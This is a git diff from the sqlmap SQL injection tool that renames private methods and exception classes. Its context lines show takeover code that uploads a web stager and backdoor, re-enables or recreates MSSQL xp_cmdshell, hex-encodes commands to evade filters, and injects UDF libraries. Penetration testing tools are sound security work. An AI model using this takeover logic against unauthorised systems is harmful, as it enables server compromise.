def udfCheckAndOverwrite(self, udf): def udfCheckAndOverwrite(self, udf):
exists = self.__checkExistUdf(udf) exists = self._checkExistUdf(udf)
overwrite = True overwrite = True
if exists: if exists:
overwrite = self.__askOverwriteUdf(udf) overwrite = self._askOverwriteUdf(udf)
if overwrite: if overwrite:
self.udfToCreate.add(udf) self.udfToCreate.add(udf)
@ -126,15 +126,15 @@ class UDF:
def udfSetRemotePath(self): def udfSetRemotePath(self):
errMsg = "udfSetRemotePath() method must be defined within the plugin" errMsg = "udfSetRemotePath() method must be defined within the plugin"
raise sqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def udfSetLocalPaths(self): def udfSetLocalPaths(self):
errMsg = "udfSetLocalPaths() method must be defined within the plugin" errMsg = "udfSetLocalPaths() method must be defined within the plugin"
raise sqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def udfCreateFromSharedLib(self, udf=None, inpRet=None): def udfCreateFromSharedLib(self, udf=None, inpRet=None):
errMsg = "udfCreateFromSharedLib() method must be defined within the plugin" errMsg = "udfCreateFromSharedLib() method must be defined within the plugin"
raise sqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def udfInjectCore(self, udfDict): def udfInjectCore(self, udfDict):
for udf in udfDict.keys(): for udf in udfDict.keys():
@ -166,7 +166,7 @@ class UDF:
def udfInjectCustom(self): def udfInjectCustom(self):
if Backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ): if Backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
errMsg = "UDF injection feature is not yet implemented on %s" % Backend.getIdentifiedDbms() errMsg = "UDF injection feature is not yet implemented on %s" % Backend.getIdentifiedDbms()
raise sqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
return return
@ -193,21 +193,21 @@ class UDF:
if not os.path.exists(self.udfLocalFile): if not os.path.exists(self.udfLocalFile):
errMsg = "the specified shared library file does not exist" errMsg = "the specified shared library file does not exist"
raise sqlmapFilePathException(errMsg) raise SqlmapFilePathException(errMsg)
if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"): if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"):
errMsg = "shared library file must end with '.dll' or '.so'" errMsg = "shared library file must end with '.dll' or '.so'"
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS): elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS):
errMsg = "you provided a shared object as shared library, but " errMsg = "you provided a shared object as shared library, but "
errMsg += "the database underlying operating system is Windows" errMsg += "the database underlying operating system is Windows"
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX): elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX):
errMsg = "you provided a dynamic-link library as shared library, " errMsg = "you provided a dynamic-link library as shared library, "
errMsg += "but the database underlying operating system is Linux" errMsg += "but the database underlying operating system is Linux"
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]
@ -305,7 +305,7 @@ class UDF:
return return
elif choice[0] in ( "q", "Q" ): elif choice[0] in ( "q", "Q" ):
self.cleanup(udfDict=self.udfs) self.cleanup(udfDict=self.udfs)
raise sqlmapUserQuitException raise SqlmapUserQuitException
while True: while True:
udfList = [] udfList = []

16
lib/takeover/web.py
View File

@ -84,12 +84,12 @@ class Web:
def webFileUpload(self, fileToUpload, destFileName, directory): def webFileUpload(self, fileToUpload, destFileName, directory):
inputFP = codecs.open(fileToUpload, "rb") inputFP = codecs.open(fileToUpload, "rb")
retVal = self.__webFileStreamUpload(inputFP, destFileName, directory) retVal = self._webFileStreamUpload(inputFP, destFileName, directory)
inputFP.close() inputFP.close()
return retVal return retVal
def __webFileStreamUpload(self, stream, destFileName, directory): def _webFileStreamUpload(self, stream, destFileName, directory):
stream.seek(0) # Rewind stream.seek(0) # Rewind
if self.webApi in getPublicTypeMembers(WEB_API, True): if self.webApi in getPublicTypeMembers(WEB_API, True):
@ -113,7 +113,7 @@ class Web:
else: else:
return True return True
def __webFileInject(self, fileContent, fileName, directory): def _webFileInject(self, fileContent, fileName, directory):
outFile = posixpath.normpath("%s/%s" % (directory, fileName)) outFile = posixpath.normpath("%s/%s" % (directory, fileName))
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
query = "" query = ""
@ -239,7 +239,7 @@ class Web:
uriPath = posixpath.normpath(uriPath).rstrip('/') uriPath = posixpath.normpath(uriPath).rstrip('/')
# Upload the file stager # Upload the file stager
self.__webFileInject(stagerContent, stagerName, localPath) self._webFileInject(stagerContent, stagerName, localPath)
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName) self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
@ -306,15 +306,15 @@ class Web:
backdoorStream.seek(0) backdoorStream.seek(0)
backdoorStream.write(backdoorContent) backdoorStream.write(backdoorContent)
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): if self._webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self._webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory self.webDirectory = backdoorDirectory
else: else:
continue continue
else: else:
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath): if not self._webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath):
warnMsg = "backdoor has not been successfully uploaded " warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "through the file stager possibly because " warnMsg += "through the file stager possibly because "
warnMsg += "the user running the web server process " warnMsg += "the user running the web server process "
@ -330,7 +330,7 @@ class Web:
getOutput = readInput(message, default="Y") getOutput = readInput(message, default="Y")
if getOutput in ("y", "Y"): if getOutput in ("y", "Y"):
self.__webFileInject(backdoorContent, backdoorName, localPath) self._webFileInject(backdoorContent, backdoorName, localPath)
else: else:
continue continue

54
lib/takeover/xp_cmdshell.py
View File

@ -28,7 +28,7 @@ from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import HASHDB_KEYS from lib.core.enums import HASHDB_KEYS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
from lib.request import inject from lib.request import inject
@ -41,7 +41,7 @@ class Xp_cmdshell:
def __init__(self): def __init__(self):
self.xpCmdshellStr = "master..xp_cmdshell" self.xpCmdshellStr = "master..xp_cmdshell"
def __xpCmdshellCreate(self): def _xpCmdshellCreate(self):
cmd = "" cmd = ""
if Backend.isVersionWithin(("2005", "2008")): if Backend.isVersionWithin(("2005", "2008")):
@ -50,18 +50,18 @@ class Xp_cmdshell:
cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
inject.goStacked(agent.runAsDBMSUser(cmd)) inject.goStacked(agent.runAsDBMSUser(cmd))
self.__randStr = randomStr(lowercase=True) self._randStr = randomStr(lowercase=True)
self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True) self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew) cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
if Backend.isVersionWithin(("2005", "2008")): if Backend.isVersionWithin(("2005", "2008")):
cmd += ";RECONFIGURE WITH OVERRIDE" cmd += ";RECONFIGURE WITH OVERRIDE"
inject.goStacked(agent.runAsDBMSUser(cmd)) inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellConfigure2005(self, mode): def _xpCmdshellConfigure2005(self, mode):
debugMsg = "configuring xp_cmdshell using sp_configure " debugMsg = "configuring xp_cmdshell using sp_configure "
debugMsg += "stored procedure" debugMsg += "stored procedure"
logger.debug(debugMsg) logger.debug(debugMsg)
@ -70,7 +70,7 @@ class Xp_cmdshell:
return cmd return cmd
def __xpCmdshellConfigure2000(self, mode): def _xpCmdshellConfigure2000(self, mode):
debugMsg = "configuring xp_cmdshell using sp_addextendedproc " debugMsg = "configuring xp_cmdshell using sp_addextendedproc "
debugMsg += "stored procedure" debugMsg += "stored procedure"
logger.debug(debugMsg) logger.debug(debugMsg)
@ -82,21 +82,21 @@ class Xp_cmdshell:
return cmd return cmd
def __xpCmdshellConfigure(self, mode): def _xpCmdshellConfigure(self, mode):
if Backend.isVersionWithin(("2005", "2008")): if Backend.isVersionWithin(("2005", "2008")):
cmd = self.__xpCmdshellConfigure2005(mode) cmd = self._xpCmdshellConfigure2005(mode)
else: else:
cmd = self.__xpCmdshellConfigure2000(mode) cmd = self._xpCmdshellConfigure2000(mode)
inject.goStacked(agent.runAsDBMSUser(cmd)) inject.goStacked(agent.runAsDBMSUser(cmd))
def __xpCmdshellCheck(self): def _xpCmdshellCheck(self):
cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2) cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
self.xpCmdshellExecCmd(cmd) self.xpCmdshellExecCmd(cmd)
return wasLastRequestDelayed() return wasLastRequestDelayed()
def __xpCmdshellTest(self): def _xpCmdshellTest(self):
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
pushValue(threadData.disableStdOut) pushValue(threadData.disableStdOut)
threadData.disableStdOut = True threadData.disableStdOut = True
@ -160,10 +160,10 @@ class Xp_cmdshell:
# Obfuscate the command to execute, also useful to bypass filters # Obfuscate the command to execute, also useful to bypass filters
# on single-quotes # on single-quotes
self.__randStr = randomStr(lowercase=True) self._randStr = randomStr(lowercase=True)
self.__cmd = "0x%s" % hexencode(cmd) self.__cmd = "0x%s" % hexencode(cmd)
self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) self._forgedCmd += "SET @%s=%s;" % (self._randStr, self.__cmd)
# Insert the command standard output into a support table, # Insert the command standard output into a support table,
# 'sqlmapoutput', except when DBMS credentials are provided because # 'sqlmapoutput', except when DBMS credentials are provided because
@ -171,11 +171,11 @@ class Xp_cmdshell:
# retrieve the output when OPENROWSET is used hence the redirection # retrieve the output when OPENROWSET is used hence the redirection
# to a temporary file from above # to a temporary file from above
if insertIntoTable and not conf.dbmsCred: if insertIntoTable and not conf.dbmsCred:
self.__forgedCmd += "INSERT INTO %s " % insertIntoTable self._forgedCmd += "INSERT INTO %s " % insertIntoTable
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) self._forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self._randStr)
return agent.runAsDBMSUser(self.__forgedCmd) return agent.runAsDBMSUser(self._forgedCmd)
def xpCmdshellExecCmd(self, cmd, silent=False): def xpCmdshellExecCmd(self, cmd, silent=False):
cmd = self.xpCmdshellForgeCmd(cmd) cmd = self.xpCmdshellForgeCmd(cmd)
@ -237,7 +237,7 @@ class Xp_cmdshell:
infoMsg += "available, please wait.." infoMsg += "available, please wait.."
logger.info(infoMsg) logger.info(infoMsg)
result = self.__xpCmdshellCheck() result = self._xpCmdshellCheck()
if result: if result:
logger.info("xp_cmdshell extended procedure is available") logger.info("xp_cmdshell extended procedure is available")
@ -250,9 +250,9 @@ class Xp_cmdshell:
choice = readInput(message, default="Y") choice = readInput(message, default="Y")
if not choice or choice in ("y", "Y"): if not choice or choice in ("y", "Y"):
self.__xpCmdshellConfigure(1) self._xpCmdshellConfigure(1)
if self.__xpCmdshellCheck(): if self._xpCmdshellCheck():
logger.info("xp_cmdshell re-enabled successfully") logger.info("xp_cmdshell re-enabled successfully")
kb.xpCmdshellAvailable = True kb.xpCmdshellAvailable = True
@ -260,10 +260,10 @@ class Xp_cmdshell:
logger.warn("xp_cmdshell re-enabling failed") logger.warn("xp_cmdshell re-enabling failed")
logger.info("creating xp_cmdshell with sp_OACreate") logger.info("creating xp_cmdshell with sp_OACreate")
self.__xpCmdshellConfigure(0) self._xpCmdshellConfigure(0)
self.__xpCmdshellCreate() self._xpCmdshellCreate()
if self.__xpCmdshellCheck(): if self._xpCmdshellCheck():
logger.info("xp_cmdshell created successfully") logger.info("xp_cmdshell created successfully")
kb.xpCmdshellAvailable = True kb.xpCmdshellAvailable = True
@ -276,7 +276,7 @@ class Xp_cmdshell:
if not kb.xpCmdshellAvailable: if not kb.xpCmdshellAvailable:
errMsg = "unable to proceed without xp_cmdshell" errMsg = "unable to proceed without xp_cmdshell"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
debugMsg = "creating a support table to write commands standard " debugMsg = "creating a support table to write commands standard "
debugMsg += "output to" debugMsg += "output to"
@ -286,4 +286,4 @@ class Xp_cmdshell:
# "The text, ntext, and image data types cannot be compared or sorted" # "The text, ntext, and image data types cannot be compared or sorted"
self.createSupportTbl(self.cmdTblName, self.tblField, "NVARCHAR(4000)") self.createSupportTbl(self.cmdTblName, self.tblField, "NVARCHAR(4000)")
self.__xpCmdshellTest() self._xpCmdshellTest()

4
lib/techniques/blind/inference.py
View File

@ -33,7 +33,7 @@ from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapThreadException from lib.core.exception import SqlmapThreadException
from lib.core.progress import ProgressBar from lib.core.progress import ProgressBar
from lib.core.settings import CHAR_INFERENCE_MARK from lib.core.settings import CHAR_INFERENCE_MARK
from lib.core.settings import INFERENCE_BLANK_BREAK from lib.core.settings import INFERENCE_BLANK_BREAK
@ -546,7 +546,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
logger.info(infoMsg) logger.info(infoMsg)
if kb.threadException: if kb.threadException:
raise sqlmapThreadException, "something unexpected happened inside the threads" raise SqlmapThreadException, "something unexpected happened inside the threads"
if abortedFlag: if abortedFlag:
raise KeyboardInterrupt raise KeyboardInterrupt

16
lib/techniques/brute/use.py
View File

@ -23,8 +23,8 @@ from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS from lib.core.enums import HASHDB_KEYS
from lib.core.exception import sqlmapDataException from lib.core.exception import SqlmapDataException
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.settings import METADB_SUFFIX from lib.core.settings import METADB_SUFFIX
from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE
from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE
@ -32,7 +32,7 @@ from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads from lib.core.threads import runThreads
from lib.request import inject from lib.request import inject
def __addPageTextWords(): def _addPageTextWords():
wordsList = [] wordsList = []
infoMsg = "adding words used on web page to the check list" infoMsg = "adding words used on web page to the check list"
@ -53,14 +53,14 @@ def tableExists(tableFile, regex=None):
errMsg = "can't use table existence check because of detected invalid results " errMsg = "can't use table existence check because of detected invalid results "
errMsg += "(most probably caused by inability of the used injection " errMsg += "(most probably caused by inability of the used injection "
errMsg += "to distinguish errornous results)" errMsg += "to distinguish errornous results)"
raise sqlmapDataException, errMsg raise SqlmapDataException, errMsg
tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True)
infoMsg = "checking table existence using items from '%s'" % tableFile infoMsg = "checking table existence using items from '%s'" % tableFile
logger.info(infoMsg) logger.info(infoMsg)
tables.extend(__addPageTextWords()) tables.extend(_addPageTextWords())
tables = filterListValue(tables, regex) tables = filterListValue(tables, regex)
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
@ -138,20 +138,20 @@ def tableExists(tableFile, regex=None):
def columnExists(columnFile, regex=None): def columnExists(columnFile, regex=None):
if not conf.tbl: if not conf.tbl:
errMsg = "missing table parameter" errMsg = "missing table parameter"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr())))
if result: if result:
errMsg = "can't use column existence check because of detected invalid results " errMsg = "can't use column existence check because of detected invalid results "
errMsg += "(most probably caused by inability of the used injection " errMsg += "(most probably caused by inability of the used injection "
errMsg += "to distinguish errornous results)" errMsg += "to distinguish errornous results)"
raise sqlmapDataException, errMsg raise SqlmapDataException, errMsg
infoMsg = "checking column existence using items from '%s'" % columnFile infoMsg = "checking column existence using items from '%s'" % columnFile
logger.info(infoMsg) logger.info(infoMsg)
columns = getFileItems(columnFile, unique=True) columns = getFileItems(columnFile, unique=True)
columns.extend(__addPageTextWords()) columns.extend(_addPageTextWords())
columns = filterListValue(columns, regex) columns = filterListValue(columns, regex)
table = safeSQLIdentificatorNaming(conf.tbl, True) table = safeSQLIdentificatorNaming(conf.tbl, True)

4
lib/techniques/dns/test.py
View File

@ -11,7 +11,7 @@ from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.exception import sqlmapNotVulnerableException from lib.core.exception import SqlmapNotVulnerableException
from lib.techniques.dns.use import dnsUse from lib.techniques.dns.use import dnsUse
@ -28,7 +28,7 @@ def dnsTest(payload):
errMsg += ". Turning off DNS exfiltration support" errMsg += ". Turning off DNS exfiltration support"
logger.error(errMsg) logger.error(errMsg)
else: else:
raise sqlmapNotVulnerableException, errMsg raise SqlmapNotVulnerableException, errMsg
else: else:
infoMsg = "data retrieval through DNS channel was successful" infoMsg = "data retrieval through DNS channel was successful"
logger.info(infoMsg) logger.info(infoMsg)

24
lib/techniques/error/use.py
View File

@ -45,7 +45,7 @@ from lib.core.threads import runThreads
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
def __oneShotErrorUse(expression, field=None): def _oneShotErrorUse(expression, field=None):
offset = 1 offset = 1
partialValue = None partialValue = None
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
@ -53,7 +53,7 @@ def __oneShotErrorUse(expression, field=None):
if retVal and PARTIAL_VALUE_MARKER in retVal: if retVal and PARTIAL_VALUE_MARKER in retVal:
partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")
dataToStdout("[%s] [INFO] resuming partial value: '%s'\r\n" % (time.strftime("%X"), __formatPartialContent(partialValue))) dataToStdout("[%s] [INFO] resuming partial value: '%s'\r\n" % (time.strftime("%X"), _formatPartialContent(partialValue)))
offset += len(partialValue) offset += len(partialValue)
threadData.resumed = retVal is not None and not partialValue threadData.resumed = retVal is not None and not partialValue
@ -133,7 +133,7 @@ def __oneShotErrorUse(expression, field=None):
break break
if kb.fileReadMode and output: if kb.fileReadMode and output:
dataToStdout(__formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
else: else:
retVal = output retVal = output
break break
@ -146,7 +146,7 @@ def __oneShotErrorUse(expression, field=None):
if isinstance(retVal, basestring): if isinstance(retVal, basestring):
retVal = htmlunescape(retVal).replace("<br>", "\n") retVal = htmlunescape(retVal).replace("<br>", "\n")
retVal = __errorReplaceChars(retVal) retVal = _errorReplaceChars(retVal)
hashDBWrite(expression, retVal) hashDBWrite(expression, retVal)
@ -156,7 +156,7 @@ def __oneShotErrorUse(expression, field=None):
return safecharencode(retVal) if kb.safeCharEncode else retVal return safecharencode(retVal) if kb.safeCharEncode else retVal
def __errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None): def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None):
outputs = [] outputs = []
origExpr = None origExpr = None
@ -177,7 +177,7 @@ def __errorFields(expression, expressionFields, expressionFieldsList, num=None,
else: else:
expressionReplaced = expression.replace(expressionFields, field, 1) expressionReplaced = expression.replace(expressionFields, field, 1)
output = NULL if emptyFields and field in emptyFields else __oneShotErrorUse(expressionReplaced, field) output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
if not kb.threadContinue: if not kb.threadContinue:
return None return None
@ -194,7 +194,7 @@ def __errorFields(expression, expressionFields, expressionFieldsList, num=None,
return outputs return outputs
def __errorReplaceChars(value): def _errorReplaceChars(value):
""" """
Restores safely replaced characters Restores safely replaced characters
""" """
@ -206,7 +206,7 @@ def __errorReplaceChars(value):
return retVal return retVal
def __formatPartialContent(value): def _formatPartialContent(value):
""" """
Prepares (possibly hex) partial content for safe console output Prepares (possibly hex) partial content for safe console output
""" """
@ -315,7 +315,7 @@ def errorUse(expression, dump=False):
countedExpression = countedExpression[:countedExpression.index(" ORDER BY ")] countedExpression = countedExpression[:countedExpression.index(" ORDER BY ")]
_, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression) _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression)
count = __oneShotErrorUse(countedExpression, countedExpressionFields) count = _oneShotErrorUse(countedExpression, countedExpressionFields)
if isNumPosStrValue(count): if isNumPosStrValue(count):
if isinstance(stopLimit, int) and stopLimit > 0: if isinstance(stopLimit, int) and stopLimit > 0:
@ -360,7 +360,7 @@ def errorUse(expression, dump=False):
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
for field in expressionFieldsList: for field in expressionFieldsList:
if __oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
emptyFields.append(field) emptyFields.append(field)
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
debugMsg += "dumped as it appears to be empty" debugMsg += "dumped as it appears to be empty"
@ -383,7 +383,7 @@ def errorUse(expression, dump=False):
except StopIteration: except StopIteration:
break break
output = __errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields) output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields)
if not kb.threadContinue: if not kb.threadContinue:
break break
@ -407,7 +407,7 @@ def errorUse(expression, dump=False):
kb.suppressResumeInfo = False kb.suppressResumeInfo = False
if not outputs and not abortedFlag: if not outputs and not abortedFlag:
outputs = __errorFields(expression, expressionFields, expressionFieldsList) outputs = _errorFields(expression, expressionFields, expressionFieldsList)
if outputs and isListLike(outputs) and len(outputs) == 1 and isinstance(outputs[0], basestring): if outputs and isListLike(outputs) and len(outputs) == 1 and isinstance(outputs[0], basestring):
outputs = outputs[0] outputs = outputs[0]

32
lib/techniques/union/test.py
View File

@ -41,21 +41,21 @@ from lib.core.unescaper import unescaper
from lib.request.comparison import comparison from lib.request.comparison import comparison
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL): def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
""" """
Finds number of columns affected by UNION based injection Finds number of columns affected by UNION based injection
""" """
retVal = None retVal = None
def __orderByTechnique(): def _orderByTechnique():
def __orderByTest(cols): def _orderByTest(cols):
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment) query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
if __orderByTest(1) and not __orderByTest(randomInt()): if _orderByTest(1) and not _orderByTest(randomInt()):
infoMsg = "ORDER BY technique seems to be usable. " infoMsg = "ORDER BY technique seems to be usable. "
infoMsg += "This should reduce the time needed " infoMsg += "This should reduce the time needed "
infoMsg += "to find the right number " infoMsg += "to find the right number "
@ -66,13 +66,13 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
lowCols, highCols = 1, ORDER_BY_STEP lowCols, highCols = 1, ORDER_BY_STEP
found = None found = None
while not found: while not found:
if __orderByTest(highCols): if _orderByTest(highCols):
lowCols = highCols lowCols = highCols
highCols += ORDER_BY_STEP highCols += ORDER_BY_STEP
else: else:
while not found: while not found:
mid = highCols - (highCols - lowCols) / 2 mid = highCols - (highCols - lowCols) / 2
if __orderByTest(mid): if _orderByTest(mid):
lowCols = mid lowCols = mid
else: else:
highCols = mid highCols = mid
@ -87,7 +87,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
lowerCount, upperCount = conf.uColsStart, conf.uColsStop lowerCount, upperCount = conf.uColsStart, conf.uColsStop
if lowerCount == 1: if lowerCount == 1:
found = kb.orderByColumns or __orderByTechnique() found = kb.orderByColumns or _orderByTechnique()
if found: if found:
kb.orderByColumns = found kb.orderByColumns = found
infoMsg = "target url appears to have %d column%s in query" % (found, 's' if found > 1 else "") infoMsg = "target url appears to have %d column%s in query" % (found, 's' if found > 1 else "")
@ -155,7 +155,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
return retVal return retVal
def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
validPayload = None validPayload = None
vector = None vector = None
@ -235,22 +235,22 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
return validPayload, vector return validPayload, vector
def __unionConfirm(comment, place, parameter, prefix, suffix, count): def _unionConfirm(comment, place, parameter, prefix, suffix, count):
validPayload = None validPayload = None
vector = None vector = None
# Confirm the union SQL injection and get the exact column # Confirm the union SQL injection and get the exact column
# position which can be used to extract data # position which can be used to extract data
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count) validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full union # Assure that the above function found the exploitable full union
# SQL injection position # SQL injection position
if not validPayload: if not validPayload:
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
return validPayload, vector return validPayload, vector
def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
""" """
This method tests if the target url is affected by an union This method tests if the target url is affected by an union
